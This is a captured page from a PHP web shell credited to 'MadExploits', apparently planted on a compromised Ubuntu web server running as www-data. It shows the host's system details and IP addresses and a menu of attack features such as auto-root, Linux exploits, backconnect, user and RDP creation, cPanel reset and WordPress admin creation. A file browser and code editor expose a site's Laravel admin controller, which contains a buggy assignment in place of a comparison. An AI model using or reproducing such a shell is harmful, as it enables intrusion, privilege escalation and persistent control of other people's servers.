Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
new_tlmf /
app /
Http /
Controllers /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
AboutusController.php
4.59
KB
-rw-rw-r--
AdminController.php
233
B
-rw-rw-r--
AlbumController.php
7.63
KB
-rw-rw-r--
CarousellController.php
4.41
KB
-rw-rw-r--
CommitteeController.php
7.94
KB
-rw-rw-r--
CommitteeTypeController.php
4.3
KB
-rw-rw-r--
ContactPersonController.php
5.13
KB
-rw-rw-r--
MasterCommitteeController.php
3.55
KB
-rw-rw-r--
MemberController.php
6.21
KB
-rw-rw-r--
MemberTypeController.php
3.14
KB
-rw-rw-r--
NewsController.php
4.41
KB
-rw-rw-r--
NoticeController.php
4.47
KB
-rw-rw-r--
SetupController.php
3.82
KB
-rw-rw-r--
VideoController.php
4
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MasterCommitteeController.php
<?php namespace App\Http\Controllers\admin; use App\Http\Requests\StoreMasterCommitteeRequest; use App\Http\Requests\UpdateMasterCommitteeRequest; use App\Models\MasterCommittee; use App\Http\Controllers\Controller; class MasterCommitteeController extends Controller { public function index() { try{ $master_committee = MasterCommittee::get(); return view('admin.master_committee.index',compact('master_committee')); }catch(\Exception $e){ return $e; return redirect()->back()->with('error',"Something Went Wrong"); } } /** * Show the form for creating a new resource. * * @return \Illuminate\Http\Response */ public function create() { try{ return view('admin.master_committee.create'); }catch(\Exception $e){ return view('frontend.index')->with('error',"Something Went Wrong"); } } /** * Store a newly created resource in storage. * * @param \Illuminate\Http\Request $request * @return \Illuminate\Http\Response */ public function store(StoreMasterCommitteeRequest $request) { try{ $input = $request->all(); if($input['status'] = "on") { $input['status'] = "1"; } else { $input['status'] = "0"; } MasterCommittee::create($input); return redirect()->route('master_committees.index')->with('success','master_committee Posted Successfully'); }catch(\Exception $e){ // return $e; return redirect()->route('master_committees.index')->with('error',"SomeThing Went Wrong"); } } /** * Display the specified resource. * * @param \App\Models\master_committee $master_committee * @return \Illuminate\Http\Response */ public function show(MasterCommittee $master_committee) { // } /** * Show the form for editing the specified resource. * * @param \App\Models\master_committee $master_committee * @return \Illuminate\Http\Response */ public function edit(MasterCommittee $master_committee) { return view('admin.master_committee.edit',compact('master_committee')); } /** * Update the specified resource in storage. * * @param \Illuminate\Http\Request $request * @param \App\Models\master_committee $master_committee * @return \Illuminate\Http\Response */ public function update(UpdateMasterCommitteeRequest $request, MasterCommittee $master_committee) { try{ // return $request; $input = $request->all(); $master_committee->update($input); return redirect()->route('master_committees.index') ->with('success','Member Type updated successfully'); }catch(\Exception $e){ return redirect()->route('master_committees.index')->with('error','Something Went Wrong'); } } /** * Remove the specified resource from storage. * * @param \App\Models\master_committee $master_committee * @return \Illuminate\Http\Response */ public function destroy(MasterCommittee $master_committee) { try{ $master_committee->delete(); return back()->with('success',"SuccessFully Deleted"); }catch(\Exception $e){ return redirect()->route('master_committees.index')->with('error',"Something Went Wrong"); } } }
Close